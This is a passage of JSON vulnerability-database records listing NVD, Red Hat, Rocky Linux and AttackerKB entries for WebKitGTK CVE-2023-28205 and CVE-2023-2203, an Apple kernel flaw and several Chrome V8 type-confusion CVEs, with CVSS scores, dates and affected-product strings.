This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-17T22:15:00", "type": "cve", "title": "CVE-2023-2203", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-25T17:25:00", "cpe": ["cpe:/o:redhat:enterprise_linux_eus:9.2", "cpe:/o:redhat:enterprise_linux_server_aus:8.8", "cpe:/a:webkitgtk:webkit2gtk3:2.38.5-1.el8", "cpe:/a:webkitgtk:webkit2gtk3:2.38.5-1.el9", "cpe:/o:redhat:enterprise_linux_eus:8.8", "cpe:/o:redhat:enterprise_linux:9.0", "cpe:/o:redhat:enterprise_linux_server_aus:9.2", "cpe:/o:redhat:enterprise_linux_server_tus:8.8", "cpe:/o:redhat:enterprise_linux:8.0"], "id": "CVE-2023-2203", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-2203", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_tus:8.8:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.8:*:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux_eus:9.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:webkitgtk:webkit2gtk3:2.38.5-1.el9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:8.8:*:*:*:*:*:*:*", "cpe:2.3:a:webkitgtk:webkit2gtk3:2.38.5-1.el8:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-02T16:25:53", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:15:00", "type": "cve", "title": "CVE-2022-1096", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-10-27T22:50:00", "cpe": [], "id": "CVE-2022-1096", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "rocky": [{"lastseen": "2023-11-08T20:26:34", "description": "An update is 
available for webkit2gtk3.\nThis update affects Rocky Linux 9.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list\nWebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-26T15:29:00", "type": "rocky", "title": "webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-26T15:29:00", "id": "RLSA-2023:1918", "href": "https://errata.rockylinux.org/RLSA-2023:1918", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T20:26:34", "description": "An update is available for webkit2gtk3.\nThis update affects Rocky Linux 8.\nA Common 
Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list\nWebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-26T15:28:43", "type": "rocky", "title": "webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-26T15:28:43", "id": "RLSA-2023:1919", "href": "https://errata.rockylinux.org/RLSA-2023:1919", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T18:11:08", "description": "An update is available for webkit2gtk3.\nThis update affects Rocky Linux 8.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity 
rating, is available for each vulnerability from the CVE list\nWebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: Regression of CVE-2023-28205 fixes in the Rocky Linux (CVE-2023-2203)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-18T19:17:56", "type": "rocky", "title": "webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-18T19:17:56", "id": "RLSA-2023:3108", "href": "https://errata.rockylinux.org/RLSA-2023:3108", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2023-11-08T18:39:13", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)\n\nFor more details about 
the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-20T14:25:34", "type": "redhat", "title": "(RHSA-2023:1918) Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-20T14:26:00", "id": "RHSA-2023:1918", "href": "https://access.redhat.com/errata/RHSA-2023:1918", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T18:39:13", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-20T14:40:24", "type": "redhat", "title": "(RHSA-2023:1919) Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-20T14:42:10", "id": "RHSA-2023:1919", "href": "https://access.redhat.com/errata/RHSA-2023:1919", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-09T16:41:24", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: Regression of CVE-2023-28205 fixes in the Red Hat Enterprise Linux (CVE-2023-2203)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": 
"3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-09T11:25:19", "type": "redhat", "title": "(RHSA-2023:2653) Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-09T11:25:52", "id": "RHSA-2023:2653", "href": "https://access.redhat.com/errata/RHSA-2023:2653", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T18:39:13", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: Regression of CVE-2023-28205 fixes in the Red Hat Enterprise Linux (CVE-2023-2203)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-16T10:20:20", "type": "redhat", "title": "(RHSA-2023:3108) Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-16T10:20:52", "id": "RHSA-2023:3108", "href": "https://access.redhat.com/errata/RHSA-2023:3108", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-11-14T02:29:17", "description": "A flaw was found in the webkitgtk package. An improper input validation issue may lead to a use-after-free vulnerability. This vulnerability allows attackers with network access to pass specially crafted web content files, causing Denial of Service or Arbitrary Code Execution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-11T06:00:16", "type": "redhatcve", "title": "CVE-2023-28205", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-11-14T02:07:20", "id": "RH:CVE-2023-28205", "href": "https://access.redhat.com/security/cve/cve-2023-28205", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-24T15:34:57", "description": "No description is available for this CVE.\n", "cvss3": {}, "published": "2022-05-24T15:33:15", "type": "redhatcve", "title": "CVE-2022-1364", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-1364"], "modified": "2022-05-24T15:33:15", "id": "RH:CVE-2022-1364", "href": "https://access.redhat.com/security/cve/cve-2022-1364", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-08T20:35:45", "description": "A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. 
This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-05T08:51:40", "type": "redhatcve", "title": "CVE-2023-2203", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-17T05:27:42", "id": "RH:CVE-2023-2203", "href": "https://access.redhat.com/security/cve/cve-2023-2203", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-25T18:06:18", "description": "An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6. An app may be able to execute arbitrary code with kernel privileges. 
Apple is aware of a report that this issue may have been actively exploited.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-04-10T00:00:00", "type": "attackerkb", "title": "CVE-2023-28206", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-10-08T00:00:00", "id": "AKB:79231140-E51A-4D22-BCAC-EE105E3A962C", "href": "https://attackerkb.com/topics/cHHio4atNx/cve-2023-28206", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-25T18:06:17", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in Safari 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. 
Apple is aware of a report that this issue may have been actively exploited.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T00:00:00", "type": "attackerkb", "title": "CVE-2023-28205", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-10-08T00:00:00", "id": "AKB:134D4E7D-267A-488A-A5A6-579DB92BB20D", "href": "https://attackerkb.com/topics/Dp6JZF5MkT/cve-2023-28205", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-25T18:06:21", "description": "Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High)\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-14T00:00:00", "type": "attackerkb", "title": "CVE-2023-2033", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-10-21T00:00:00", "id": "AKB:07A7A29D-FB0E-4747-8ADD-86F2AF2948C4", "href": "https://attackerkb.com/topics/mIt022p537/cve-2023-2033", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-25T18:06:26", "description": "Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High)\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-01T00:00:00", "type": "attackerkb", "title": "CVE-2022-3723", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2023-10-08T00:00:00", "id": "AKB:64665D95-5095-4796-9404-96BAEED41106", "href": "https://attackerkb.com/topics/4dXwXSTpmo/cve-2022-3723", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:37:24", "description": "Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
